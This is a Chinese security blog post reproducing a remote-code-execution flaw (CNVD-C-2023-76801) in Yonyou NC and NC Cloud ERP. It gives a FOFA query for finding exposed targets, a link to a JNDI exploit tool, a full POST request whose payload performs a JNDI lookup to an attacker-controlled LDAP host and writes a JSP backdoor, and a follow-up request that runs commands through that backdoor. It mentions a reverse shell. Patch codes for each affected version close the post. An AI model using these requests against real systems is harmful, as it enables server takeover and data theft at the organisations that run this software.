用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)

最新推荐文章于 2024-02-23 11:19:31 发布
最新推荐文章于 2024-02-23 11:19:31 发布
阅读量9.5k 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/131456781
版权

0x01 产品简介

        用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理。

0x02 漏洞概述

     用友NC及NC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器

0x03 影响范围

NC63、NC633、NC65、NC Cloud1903、NC Cloud1909、NC Cloud2005、NC Cloud2105、NC Cloud2111、YonBIP高级版2207

0x04 复现环境

 FOFA:app="用友-NC-Cloud"

 0x05 漏洞复现

 准备JNDI注入工具

 https://github.com/WhiteHSBG/JNDIExploit

  EXP:

POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax.naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatEcho')}","webapps/nc_web/jndi.jsp"]}

利用思路:调用”nc.itf.iufo.IBaseSPService“服务中的"saveXStreamConfig"的方法,来接受对象和字符串,使用Java反射机制创建了一个javax.naming.InitialContext对象,并通过LDAP协议连接到指定的IP地址和端口,最后在根目录生成jsp恶意后门程序

EXP中使用的是JNDI工具的TomcatEcho回显链

上传恶意文件

 开启ldap监听

 执行命令并回显

GET /jndi.jsp HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
cmd: whoami

反弹shell

 

 0x06 修复建议

打对应补丁,重启服务,各版本补丁获取方式如下:

NC63方案

补丁名称:NC63uapjs安全问题补丁

补丁编码:NCM_NC6.3_000_UAP_BTS_20230308_GP_268498360

https://dsp.yonyou.com/patchcenter/patchdetail/10231678268499522701/0/2

 

NC633方案

补丁名称:NC633uapjs安全问题补丁

补丁编码:NCM_NC6.33_000_UAP_BTS_20230308_GP_268527193

https://dsp.yonyou.com/patchcenter/patchdetail/10231678268528400707/0/2

 

NC65方案

补丁名称:NC65uapjs安全问题补丁

补丁编码:NCM_NC6.5_000_UAP_BTS_20230308_GP_269462199

https://dsp.yonyou.com/patchcenter/patchdetail/10231678269463403718/0/2

 

NCC1903方案

补丁名称:NCC1903uapjs安全问题补丁

补丁编码:NCM_NCCLOUD1903_10_UAP_BTS_20230308_GP_268560504

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268561687890/0/2

NCC1909方案

补丁名称:NCC1909uapjs安全问题补丁

补丁编码:NCM_NCCLOUD1909_10_UAP_BTS_20230308_GP_268596672

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268597774895/0/2

 

NCC2005方案

补丁名称:NCC2005uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2020.05_10_UAP_BTS_20230308_GP_268622200

https://dsp.yonyou.com/patchcenter/patchdetail/10231678944167066463/0/2

 

NCC2105方案

补丁名称:NCC2105uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2021.05_10_UAP_BTS_20230308_GP_268652747

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268653876905/0/2

 

NCC2111方案

补丁名称:NCC2111uapjs安全问题补丁

补丁编码:NCM_NCCLOUD2021.11_010_UAP_BTS_20230308_GP_268680318

https://dsp.yonyou.com/patchcenter/patchdetail/11231678268681473910/0/2

 

YonBIP高级版2207方案

补丁名称:YonBIP高级版2207uapjs安全问题补丁

补丁编码:NCM_YONBIP高级2207_010_UAP_BTS_20230308_GP_267337472

https://dsp.yonyou.com/patchcenter/patchdetail/11231678267338650434/0/2

0xSecl
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 16
    评论
专栏目录
订阅专栏
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 553
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理的用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
用友NC-uapjs代码执行漏洞(含批量验证poc)
最新发布
weixin_43567873的博客
04-07 165
用友NC-uapjs代码执行漏洞(含批量验证poc)
向日葵RCE漏洞CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
Struts2-RCE:Burp Extender用于检查struts 2 RCE漏洞
04-15
Struts2-RCE 一个Burp Extender,用于检查struts 2 RCE漏洞。 描述 此burp扩展有助于识别struts2 Web应用程序中的Struts2远程代码执行漏洞。 此Burp扩展程序检测以下18个RCE,它们是 S2-001 S2-007 S2-008 S2-012 S2-013 S2-014 S2-015 S2-016 S2-019 S2-029 S2-032 S2-033 S2-037 S2-045 S2-048 S2-053 S2-057 S2-DevMode 加载扩展 Burp Suite- > Extender- > Add- > Select the Struts.jar file- > Next. 一旦加载而没有任何错误,将在现有的burp实例中弹出一个新选项卡。 用法 只需右键单击所选请求,然后单击“检查S
CVE-2020-14368:Eclipse CHE的交互式RCE漏洞演示
05-15
CSWSH-THEIA-CVE-2020-14368 报告目标:可在che.openshift.io上获得Eclipse CHE部署 漏洞类型:跨站点Websocket劫持 发现日期:2020-04-08 作者:Robin Duda(codingchili @ github) 概括 Eclipse CHE adn Theia中的/ services websocket端点容易受到跨站点websocket劫持的攻击。 此漏洞影响使用cookie或基本身份验证的Eclipse CHE服务器,因为Websocket连接不会执行任何跨站点检查或通道内身份验证,从第三方域进行连接时,浏览器会自动包含所有凭据。 该攻击的工作原理与跨站点请求伪造攻击一样,不同之处在于它的功能强大得多,因为它可以使攻击者进行双向通信。 在此处阅读有关CSWSH的更多信息: ://portswigger.net/w
weblogic_rce:cve2019_2725,CNVD-C-2019-48814 Weblogic _async远程命令执行exp
03-15
CNVD-C-2019-48814,CVE-2019-2725 Weblogic _async远程命令执行exp 主要代码基于js实现。 Linux Payload使用Jason,Windows Payload修改为10271,执行java.lang.Runtime。 环境需求 Windows的所有版本。 用法 cve2019-2725_weblogic_rce.bat http://192.168.31.5:7001 "cat /etc/passwd" 漏洞信息 接触
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8766
用友NC 漏洞汇总
CNVD-C-2023-76801用友NC uapjs RCE漏洞复现[附POC]
薛定谔嘚喵博客
11-08 1028
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs (jsinvoke)应用构造恶意请求非法上传后门程序此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器。
用友 NC Cloud jsinvoke 任意文件上传
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
12-01 776
用友 NC Cloud 中存在 jsinvoke 接口的任意文件上传漏洞,攻击者可以通过利用此漏洞向系统上传任意恶意文件。
用友-NC-Cloud远程代码执行漏洞(你懂的)
weixin_43689708的博客
07-22 875
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。
用友全版本任意文件上传漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-26 1916
可以使用安全的文件验证机制,例如校验文件的魔术字节、文件头信息、文件结尾等,以确保上传的文件是预期的有效文件,并阻止上传恶意文件。限制文件上传:通过限制用户上传文件的类型、大小和目标路径,可以有效减少任意文件上传漏洞的风险。安全教育和培训:对系统管理员和用户进行安全教育和培训,提高其安全意识,让他们了解常见的安全威胁和最佳实践,以便正确地使用系统和应对潜在威胁。安全审计和监控:实施安全审计和监控机制,定期检查系统日志、访问日志和上传文件日志,及时发现异常活动和潜在的攻击行为。利用此漏洞需要俩段poc。
WinRAR 代码执行漏洞RCE (CVE-2023-38831)-资源包
09-11
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。 WinRAR是一款文件压缩器,该产品支持RAR、ZIP等格式文件的压缩和解压等。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。 RARLabs WinRAR 6.23之前版本存在安全漏洞,攻击者利用该漏洞可以执行任意代码。
用友ERP U8数据字典
06-10
用友ERP U8数据字典
新接口-用友NC-Cloud系统某接口存在信息泄露漏洞-1day未公开漏洞
weixin_43167326的博客
02-23 394
用友NC-Cloud是一款基于云计算的企业管理软件,提供财务、人力资源、供应链管理等全方位业务管理功能,并结合大数据、人工智能等前沿技术,实现智能化决策支持和业务流程优化。NC-Cloud采用模块化架构,灵活适配各行业需求,可实现跨地域、跨部门的协同办公,帮助企业实现数字化转型,提升管理效率和决策精准度。
用友NC CLOUD 工具
kyyh0386的博客
07-21 2111
用友NC CLOUD 工具 nccloud所有版本
yonbip 找后端代码
weixin_41992772的博客
02-16 219
1.入一个spr 找你模块的路径。基本上就可以找到他的返回类了。比如客户应收单,去srp里面找。找到后负责到开发工具。
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 7917
用友OA/NC/NCCloud漏洞集合
用友NC NCCLOUD BIP ldap公共入口uapjs漏洞补丁
QB2767846279
03-27 1646
ncc1909ldap公共入口漏洞补丁。ncc1909ldap公共入口漏洞补丁。ncc2005ldap公共入口漏洞补丁。ncc2005ldap公共入口漏洞补丁。nc633_ldap公共入口漏洞补丁。nc633_ldap公共入口漏洞补丁。nc65_ldap公共入口漏洞补丁。nc65_ldap公共入口漏洞补丁。nc63_ldap公共入口漏洞补丁。nc63_ldap公共入口漏洞补丁。nc57_ldap公共入口漏洞补丁。nc57_ldap公共入口漏洞补丁。
CVE-2017-15715漏洞和SSI-RCE漏洞
07-27
CVE-2017-15715是一个存在于Apache Tomcat软件中的漏洞,该漏洞使得攻击者可以通过发送特制的HTTP请求,触发目标服务器上的远程代码执行。这个漏洞的影响范围是Tomcat 9.0.0.M1到9.0.0.M28版本(不包括9.0.0.M9版本)。如果目标服务器受到此漏洞的影响,攻击者可以利用它执行任意代码,可能导致敏感信息泄露或服务器完全被控制。 SSI-RCE漏洞是一种服务器端包含(SSI)漏洞,可能导致远程命令执行。SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页中。如果服务器未正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码来执行任意命令。这种漏洞可能会导致服务器被完全控制,从而造成数据泄露、服务拒绝或其他恶意行为。 请注意,对于具体的漏洞信息和修复建议,请查阅相应漏洞的CVE编号或相关安全公告以获取更准确和详细的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值